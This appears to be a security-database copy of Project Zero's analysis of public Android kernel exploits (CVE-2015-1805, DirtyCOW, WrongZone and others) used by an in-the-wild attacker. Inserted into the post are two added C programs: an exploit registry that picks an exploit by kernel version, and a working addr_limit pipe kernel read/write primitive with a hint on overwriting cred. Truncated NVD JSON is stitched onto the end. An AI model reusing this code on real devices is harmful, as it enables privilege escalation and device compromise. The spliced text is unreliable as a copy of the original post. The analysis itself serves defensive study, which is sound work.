ID GOOGLEPROJECTZERO:814DAD5293CFBE484AFB6C0462210E0D Type googleprojectzero Reporter GoogleProjectZero Modified 2021-01-12T00:00:00
Description
This is part 4 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post (https://googleprojectzero.blogspot.com/2021/01/introducing-in-wild-series.html).
Posted by Mark Brand, Project Zero
A survey of the exploitation techniques used by a high-tier attacker against Android devices in 2020
Introduction
After one of the Chrome exploits has been successful, there are several (quite simple) stages of payload decryption that occur. Once we've got through that, we reach a much more complex binary that is clearly the result of some engineering work. Thanks to that engineering it's very simple for us to locate and examine the exploits embedded inside! For each privilege elevation, they have a function in the .init_array which will register it into a global list which they later use -- this makes it easy for them to plug-and-play additional exploits into their framework, but is also very convenient for us when reverse-engineering their framework:
[image: android1.png]
Each of the "xyz_register" functions looks like the following, adding an entry to the global list with a probe function used to check whether the device is vulnerable to the given exploit, and to estimate likelihood of success, and an exploit function used to launch the exploit. These probe functions are then used to dynamically determine the best exploit to use based on runtime information about the target device.
[image: android2.png]
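As an added illustration of the registration pattern just described (example code written for this page, not the attacker's binary), the C program below registers two hypothetical exploits from constructor functions, which the toolchain places in .init_array, and then picks the entry whose probe reports the highest score for a given target. The names reuse the post's "iovy" and "cow", but the probe logic is made up for illustration: it compares the kernel release against the upstream fix versions (3.16 for CVE-2015-1805, 4.8.3 for CVE-2016-5195), which is a poor proxy on Android because vendor kernels backport fixes without bumping the version; the exploit bodies are stubs.

```c
/* exploit_registry.c -- illustrative plug-in framework, not the attacker's code. */
#include <stdio.h>
#include <string.h>
#include <sys/utsname.h>

/* Runtime facts a probe function gets to inspect (hypothetical layout). */
struct target_info {
    int kmajor, kminor, kpatch;   /* kernel release, e.g. 3.10.49 */
    int arch_bits;                /* 32 or 64 */
};

/* One registry entry: the name/probe/exploit triple the post describes. */
struct exploit_entry {
    const char *name;
    int (*probe)(const struct target_info *);   /* 0 = not applicable, else score 1..100 */
    int (*run)(const struct target_info *);     /* would launch the exploit; stubbed here */
};

#define MAX_EXPLOITS 16
static struct exploit_entry g_exploits[MAX_EXPLOITS];
static int g_num_exploits;

static void exploit_register(const struct exploit_entry *e)
{
    if (g_num_exploits < MAX_EXPLOITS)
        g_exploits[g_num_exploits++] = *e;
}

/* True if the target kernel is older than a.b.c. */
static int kver_lt(const struct target_info *t, int a, int b, int c)
{
    if (t->kmajor != a) return t->kmajor < a;
    if (t->kminor != b) return t->kminor < b;
    return t->kpatch < c;
}

/* Hypothetical probes: version thresholds are the upstream fix versions; a real
   probe would need per-device checks because vendor kernels backport fixes. */
static int iovy_probe(const struct target_info *t)
{
    if (!kver_lt(t, 3, 16, 0)) return 0;
    return t->arch_bits == 32 ? 90 : 60;   /* userspace shellcode is easier without PXN */
}
static int cow_probe(const struct target_info *t)
{
    return kver_lt(t, 4, 8, 3) ? 50 : 0;
}
static int not_run(const struct target_info *t) { (void)t; return -1; }

/* Constructor functions land in .init_array, which is exactly what made the
   registrations easy to spot when reverse engineering the binary. */
__attribute__((constructor)) static void iovy_register(void)
{
    struct exploit_entry e = { "iovy", iovy_probe, not_run };
    exploit_register(&e);
}
__attribute__((constructor)) static void cow_register(void)
{
    struct exploit_entry e = { "cow", cow_probe, not_run };
    exploit_register(&e);
}

/* Pick the registered exploit whose probe reports the highest score (NULL if none). */
const struct exploit_entry *exploit_select(const struct target_info *t)
{
    const struct exploit_entry *best = NULL;
    int best_score = 0;
    for (int i = 0; i < g_num_exploits; i++) {
        int s = g_exploits[i].probe(t);
        if (s > best_score) { best_score = s; best = &g_exploits[i]; }
    }
    return best;
}

int exploit_count(void) { return g_num_exploits; }

/* Fill target_info from uname(2); returns 0 on success. */
int target_info_from_host(struct target_info *t)
{
    struct utsname u;
    t->kmajor = t->kminor = t->kpatch = 0;
    if (uname(&u) != 0) return -1;
    if (sscanf(u.release, "%d.%d.%d", &t->kmajor, &t->kminor, &t->kpatch) < 2) return -1;
    t->arch_bits = (int)(sizeof(void *) * 8);
    return 0;
}

int main(void)
{
    struct target_info t;
    if (target_info_from_host(&t) != 0) return 1;
    const struct exploit_entry *e = exploit_select(&t);
    printf("kernel %d.%d.%d (%d-bit): %s\n", t.kmajor, t.kminor, t.kpatch,
           t.arch_bits, e ? e->name : "no applicable exploit");
    return 0;
}
```

Seen from the reverser's side, the same structure is what makes the framework easy to enumerate: dump .init_array, follow each constructor to the registration call, and the name/probe/exploit triples fall out.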
Looking at the probe functions gives us an idea of which devices are supported, but we can already see something fairly surprising: this attacker is using entirely public exploits for their privilege elevations. Of course, we can't tell for sure that they didn't know about any of these bugs prior to the original public disclosures; but their exploit configuration structure contains an internal "name" describing the exploit, and those map very neatly to either public naming ("iovy", "cow") or CVE numbers ("0569", "0820" for exploits targeting CVE-2015-0569 and CVE-2016-0820 respectively), suggesting that these exploits were very likely developed after those public disclosures and not before.
In addition, as we'll see below, most of the exploits are closely related to public exploits or descriptions of techniques used to exploit the bugs -- adding further weight to the theory that these exploits were implemented well after the original patches were shipped.
Of course, it's important to note that we had a narrow window of opportunity during which we were capturing these exploit chains, and it wasn't possible for us to exhaustively test with different devices and patch levels. It's entirely possible that this attacker also has access to Android 0-day privilege elevations, and we just failed to extract those from the server before being detected. Nonetheless, it's certainly an interesting data-point to see an attacker pairing a sophisticated 0-day exploit for Chrome with, well, a load of bugs patched between 2 and 5 years ago.
Anyway, without further ado let's take a look at the exploits they did fit in here!
Common Techniques
addr_limit pipe kernel read-write: By corrupting the addr_limit variable in the task_struct (the boundary the kernel's user-access checks enforce), this technique gives a user-mode process the ability to read and write arbitrary kernel memory by passing kernel pointers when writing to and reading from a pipe.
Userspace shellcode: PXN support on 32-bit Android devices is quite rare, so on most 32-bit devices it was/is still possible to directly execute shellcode from the user-mode portion of the address space. See KEEN Lab "Emerging Defense in Android Kernel" (https://keenlab.tencent.com/en/2016/06/01/Emerging-Defense-in-Android-Kernel/) for more information.
Point to userspace memory: PAN support is not ubiquitous on 64-bit Android devices, so it was (on older Android versions) often possible even on 64-bit devices for a kernel exploit to use this technique. See KEEN Lab "Emerging Defense in Android Kernel" (https://keenlab.tencent.com/en/2016/06/01/Emerging-Defense-in-Android-Kernel/) for more information.
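The addr_limit pipe primitive above, as an added example (not code from the post or from the exploits it describes). It assumes addr_limit has already been raised by some other bug; the functions then read and write kernel memory by bouncing bytes through a pipe: write(2) makes the kernel copy from the source address into the pipe buffer, and read(2) copies them back out into the destination. Because the same syscall sequence works unchanged for userspace addresses, the self-test in main() copies a constructed buffer larger than the pipe's default 64 KiB capacity, which exercises the chunking without needing a corrupted addr_limit. Before relying on the primitive for real, the natural sanity check is that write() against a known kernel address no longer fails with EFAULT.

```c
/* pipe_kmem.c -- illustrative addr_limit pipe read/write helpers, not exploit code. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* A pipe pair reused for every transfer. */
struct pipe_kmem {
    int fd[2];
};

int pipe_kmem_init(struct pipe_kmem *p)
{
    return pipe(p->fd);
}

/* Copy len bytes from src to dst by bouncing them through the pipe.
   With addr_limit cleared, src (or dst) may be a kernel address: the
   kernel's access_ok check no longer rejects it, so write(2) copies from src
   into the pipe buffer and read(2) copies back out to dst.  If addr_limit has
   NOT been raised, write() fails with EFAULT for a kernel pointer and we
   return -1.  Transfers are chunked so a write never has to wait for a
   reader: each chunk is drained before the next is written. */
static ssize_t pipe_copy(struct pipe_kmem *p, const void *src, void *dst, size_t len)
{
    const size_t chunk = 4096;   /* <= PIPE_BUF and well under the 64 KiB default capacity */
    size_t done = 0;
    while (done < len) {
        size_t n = len - done < chunk ? len - done : chunk;
        ssize_t w = write(p->fd[1], (const char *)src + done, n);
        if (w < 0) return -1;
        ssize_t r = 0;
        while (r < w) {
            ssize_t got = read(p->fd[0], (char *)dst + done + (size_t)r, (size_t)(w - r));
            if (got <= 0) return -1;
            r += got;
        }
        done += (size_t)w;
    }
    return (ssize_t)done;
}

/* Read len bytes of kernel memory at kaddr into buf. */
ssize_t kmem_read(struct pipe_kmem *p, uintptr_t kaddr, void *buf, size_t len)
{
    return pipe_copy(p, (const void *)kaddr, buf, len);
}

/* Write len bytes from buf into kernel memory at kaddr. */
ssize_t kmem_write(struct pipe_kmem *p, uintptr_t kaddr, const void *buf, size_t len)
{
    return pipe_copy(p, buf, (void *)kaddr, len);
}

/* Read one pointer-sized word, the building block for walking kernel structures. */
int kmem_read_ulong(struct pipe_kmem *p, uintptr_t kaddr, unsigned long *out)
{
    return kmem_read(p, kaddr, out, sizeof *out) == (ssize_t)sizeof *out ? 0 : -1;
}

int main(void)
{
    struct pipe_kmem p;
    unsigned char src[100000], dst[100000];   /* constructed data, larger than the pipe */
    if (pipe_kmem_init(&p) != 0) return 1;
    for (size_t i = 0; i < sizeof src; i++) src[i] = (unsigned char)(i * 7);
    if (kmem_read(&p, (uintptr_t)src, dst, sizeof src) != (ssize_t)sizeof src) return 1;
    printf("%s\n", memcmp(src, dst, sizeof src) == 0 ? "pipe copy ok" : "mismatch");
    return 0;
}
```

The step the post describes after this primitive, overwriting the current process's cred struct, is just kmem_read_ulong() to walk from task_struct to cred followed by kmem_write() over the id fields; the offsets are kernel-build specific and are not given here.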
iovy
The vulnerabilities:
CVE-2015-1805 is a vulnerability in the Linux kernel handling read/write for pipe iovectors, leading to the use of an out-of-bounds struct iovec.
CVE-2016-3809 is an information leak, disclosing the address of a kernel sock structure.
Strategy: Heap-spray with fake iovectors using sendmmsg, race write, readv and mmap/munmap to trigger the vulnerability. This produces a single-use kernel write-what-where.
Subsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, then corrupt the socket member of the sock structure to point to userspace memory containing a fake structure (and function pointer table); execute userspace shellcode, elevating privileges.
Copy/Paste: ~90%. The exploit strategy is the same as public exploit code (https://github.com/dosomder/iovyroot), and it looks like this was used as a starting point. The authors did some additional work, presumably to increase portability and stability, and the subsequent flow doesn't match any existing public exploit (that I found), but all of the techniques are publicly known.
Additional References: KEEN Lab "Talk is Cheap, Show Me the Code" (https://speakerdeck.com/retme7/talk-is-cheap-show-me-the-code).
iovy_pxn2
The vulnerabilities: Same as iovy, plus: P0-822 (https://bugs.chromium.org/p/project-zero/issues/detail?id=822) is an information leak, allowing the reading of arbitrary kernel memory.
Strategy: Same as above.
Subsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, and use P0-822 to leak the address of the function pointer table associated with the socket. Then use P0-822 again to leak the necessary details to build a JOP chain that will clear the addr_limit. Corrupt one of the function pointers to invoke the JOP chain, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges.
Copy/Paste: ~70%. The exploit strategy is the same as above, building the same primitive as the public exploit (addr_limit pipe kernel read-write). Instead of the public approach, they leverage the two additional vulnerabilities, which had public code available. It seems like the development of this exploit was copy/paste integration of the alternative memory-leak primitives, probably to increase portability. The code used for P0-822 is direct copy-paste (inner loop shown below).
[image: android3.png]
iovy_pxn3
The vulnerabilities: Same as iovy.
Strategy: Heap-spray with pipe buffers. One thread each for read/write/readv/writev and the usual mmap/munmap thread. Modify all of the pipe buffers, and then run either "read and writev" or "write and readv" threads to get a reusable kernel read-write.
Subsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, then use kernel-read to leak the address of the function pointer table associated with the socket. Use kernel-read again to leak the necessary details to build a JOP chain that will clear the addr_limit. Corrupt one of the function pointers to invoke the JOP chain, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges.
Copy/Paste: ~30%. The heap-spray technique is the same as another public exploit (https://github.com/snorez/exploits/blob/master/cve-2015-1805/exp.c), but there is significant additional synchronization added to support multiple reads and writes. There's not really enough unique commonality to determine whether the authors started with that code as a reference or not.
0569
The vulnerability: According to the release notes, CVE-2015-0569 is a heap overflow in Qualcomm's wireless extension IOCTLs. This appears to be where the exploit name is derived from; however as you can see at the Qualcomm advisory (https://www.codeaurora.org/security-advisory/multiple-issues-in-wlan-driver-allow-local-privilege-escalation-cve-2015-0569-cve-2015-0570-cve-2015-0571), there were actually 15 commits here under 3 CVEs, and the exploit appears to actually target one of the stack overflows, which was patched as CVE-2015-0570.
Strategy: Corrupt return address; return to userspace shellcode.
Subsequent flow: The shellcode corrupts addr_limit, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges.
Copy/Paste: 0%. This bug is trivial to exploit for non-PXN targets, so there would be little to gain by borrowing code.
Additional References: KEEN Lab "Rooting every Android" (https://www.blackhat.com/docs/eu-16/materials/eu-16-Shen-Rooting-Every-Android-From-Extension-To-Exploitation-wp.pdf).
0820
The vulnerability: CVE-2016-0820 (https://bugs.chromium.org/p/project-zero/issues/detail?id=678), a linear data-section overflow resulting from a lack of bounds checking.
Strategy & subsequent flow: This exploit follows exactly the strategy and flow described in the KEEN Lab presentation.
Copy/Paste: ~20%. The only public code we could find for this is the PoC attached to our bugtracker - it seems most likely that this was an independent implementation written after KEEN lab's presentation and based on their description.
Additional References: KEEN Lab "Rooting every Android" (https://www.blackhat.com/docs/eu-16/materials/eu-16-Shen-Rooting-Every-Android-From-Extension-To-Exploitation-wp.pdf).
COW
The vulnerability: CVE-2016-5195 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5195), also known as DirtyCOW.
Strategy: Depending on the system configuration their exploit will choose between using /proc/self/mem or ptrace for the write thread.
Subsequent flow: There are several different exploitation strategies depending on the target environment, and the full exploitation process here is a fairly complex state-machine involving several hops into different processes, which is likely necessary to support launching the exploit from within an isolated app context.
Copy/Paste: ~5%. The basic code necessary to exploit CVE-2016-5195 was probably copied from one of the many public sources, but the majority of the complexity here is in what is done next, and this doesn't seem to be similar to any of the public Android exploits.
9568
The vulnerability: CVE-2018-9568 (fix: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/core/sock.c?id=9d538fa60bad4f7b23193c89e843797a1cf71ef3), also known as WrongZone.
Strategy & subsequent flow: This exploit follows exactly the strategy and flow described in the Baidu Security Lab blog post.
Copy/Paste: ~20%. The code doesn't seem to match the publicly available exploit code for this bug, and it seems most likely that this was an independent implementation written after Baidu's blog post and based on their description.
Additional References: Alibaba Security "From Zero to Root" (https://github.com/ThomasKing2014/slides/blob/master/Building%20universal%20Android%20rooting%20with%20a%20type%20confusion%20vulnerability.pdf); Baidu Security Lab "KARMA shows you offense and defense" (https://mp.weixin.qq.com/s?__biz=MzA3NTQ3ODI0NA==&mid=2247485060&idx=1&sn=b3773b0478f7b5ee39fa1a6527b4f3ff).
Conclusion
Nothing very interesting, which is interesting in itself!
Here is an attacker who has access to 0day vulnerabilities in Chrome and Windows, and the ability to develop new and very reliable exploitation techniques in order to exploit these vulnerabilities -- and yet their Android privilege elevation capabilities appear to consist entirely of exploits using public, documented techniques and n-day vulnerabilities.
It certainly seems like they have the capability to write Android exploits. The exploits seem to be based on publicly available source code, and their implementations are based on exploitation strategies described in public sources.
One explanation for this would be that they serve different payloads depending on the targeting, and we were only receiving a "low-value" privilege-elevation capability. Alternatively, perhaps exploit server URLs that we had access to were specifically configured for a user that they know uses an older device that would be vulnerable to one of these exploits?
Based on all the information available, it's likely that they have more device-specific 0day exploits. We might just not have tested with a device/firmware version that they supported for those exploits and inadvertently missed their more modern exploits.
About the only solid conclusion that we can make is that attackers clearly still see value in developing and maintaining exploits for fairly old Android vulnerabilities, to the extent of supporting those devices long past when their original manufacturers provide support for them.
This is part 4 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 5: Android Post-Exploitation (https://googleprojectzero.blogspot.com/2021/01/in-wild-series-android-post-exploitation.html).
Source: https://googleprojectzero.blogspot.com/2021/01/in-wild-series-android-exploits.html (published 2021-01-12)
CVEs discussed: CVE-2015-0569, CVE-2015-0570, CVE-2015-0571, CVE-2015-1805, CVE-2016-0820, CVE-2016-3809, CVE-2016-5195, CVE-2018-9568
["CWE-862"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0571"], "modified": "2020-07-31T18:56:00", "cpe": ["cpe:/o:linux:linux_kernel:4.20.15", "cpe:/o:linux:linux_kernel:3.18.66"], "id": "CVE-2015-0571", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0571", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.20.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.18.66:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:06", "description": "The networking component in Android before 2016-07-05 on Android One, Nexus 5, Nexus 5X, Nexus 6, Nexus 6P, Nexus 7 (2013), Nexus 9, Nexus Player, and Pixel C devices allows attackers to obtain sensitive information via a crafted application, aka internal bug 27532522.", "edition": 6, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-07-11T02:00:00", "title": "CVE-2016-3809", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3809"], "modified": "2016-07-12T17:57:00", "cpe": ["cpe:/o:google:android:6.0.1"], "id": "CVE-2016-3809", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3809", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:google:android:6.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:21:20", "description": "Heap-based buffer overflow in the private wireless extensions IOCTL implementation in wlan_hdd_wext.c in the WLAN (aka Wi-Fi) driver for the Linux kernel 3.x and 4.x, as used in Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, allows attackers to gain privileges via a crafted application that establishes a packet filter.", "edition": 11, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-05-09T10:59:00", "title": "CVE-2015-0569", "type": "cve", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0569"], "modified": "2020-07-31T18:45:00", "cpe": ["cpe:/o:linux:linux_kernel:4.20.15", "cpe:/o:linux:linux_kernel:3.19.8"], "id": "CVE-2015-0569", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0569", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.20.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.19.8:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:52:43", "description": "In sk_clone_lock of sock.c, there is a possible memory corruption due to type confusion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-113509306. References: Upstream kernel.", "edition": 11, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-12-06T14:29:00", "title": "CVE-2018-9568", "type": "cve", "cwe": ["CWE-704"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2018-9568"], "modified": "2020-10-15T13:28:00", "cpe": ["cpe:/o:redhat:enterprise_linux_server_tus:7.6", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.6", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.6", "cpe:/o:google:android:-", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2018-9568", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-9568", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:-:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2021-02-02T06:28:00", "description": "The MediaTek Wi-Fi kernel driver in Android 6.0.1 before 2016-03-01 allows attackers to gain privileges via a crafted application, aka internal bug 26267358.", "edition": 4, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-03-12T21:59:00", "title": "CVE-2016-0820", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 
8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0820"], "modified": "2016-11-28T19:55:00", "cpe": ["cpe:/o:google:android:6.0.1"], "id": "CVE-2016-0820", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0820", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:google:android:6.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:21:22", "description": "The (1) pipe_read and (2) pipe_write implementations in fs/pipe.c in the Linux kernel before 3.16 do not properly consider the side effects of failed __copy_to_user_inatomic and __copy_from_user_inatomic calls, which allows local users to cause a denial of service (system crash) or possibly gain privileges via a crafted application, aka an \"I/O vector array overrun.\"", "edition": 6, "cvss3": {}, "published": "2015-08-08T10:59:00", "title": "CVE-2015-1805", "type": "cve", "cwe": ["CWE-17"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1805"], "modified": "2018-01-05T02:30:00", "cpe": ["cpe:/o:google:android:6.0", "cpe:/o:linux:linux_kernel:3.15.10", "cpe:/o:google:android:5.1.1", 
"cpe:/o:google:android:5.1", "cpe:/o:google:android:4.4.3", "cpe:/o:google:android:5.0.1"], "id": "CVE-2015-1805", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1805", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:google:android:4.4.3:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:5.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.15.10:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:5.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:08", "description": "Race condition in mm/gup.c in the Linux kernel 2.x through 4.x before 4.8.3 allows local users to gain privileges by leveraging incorrect handling of a copy-on-write (COW) feature to write to a read-only memory mapping, as exploited in the wild in October 2016, aka \"Dirty COW.\"", "edition": 18, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-11-10T21:59:00", "title": "CVE-2016-5195", "type": "cve", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5195"], "modified": 
